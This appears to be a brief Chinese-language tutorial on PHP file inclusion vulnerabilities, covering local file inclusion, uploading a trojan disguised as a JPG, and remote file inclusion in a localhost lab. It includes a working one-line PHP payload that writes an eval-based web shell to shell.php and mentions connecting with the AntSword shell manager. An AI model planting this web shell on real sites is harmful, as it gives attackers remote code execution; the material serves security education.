漏洞基础
程序在引用文件的时,引用的文件名存在用户可控的情况,传入的文件名没有经过合理的校验或校验不严,从而操作了预想之外的文件,就有可能导致文件泄漏和恶意的代码注入;
本地文件包含
指通过相对路径/绝对路径 的方式能打开并包含 本地文件的漏洞
包含条件: 用户可以动态控制变量!
访问任意文件
我们当前目录下有一个222.php文件
更改filename参数的内容可读取到222.php文件的内容
本地上传文件
将木马文件伪装成jpg文件上传到本地,返回文件的相对路径
由于文件在/include目录下,所以需要使用相对路径,访问即可访问到带有木马的图片
远程文件包含
将如下代码写入文本文件内,放在www的根目录下,此文件的url地址为http://127.0.0.1/666.txt
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['cmd']);?>")?>
把filename参数修改为666.txt文件的url地址,即可在fileinclude目录下生成shell.php
用蚁剑连接即可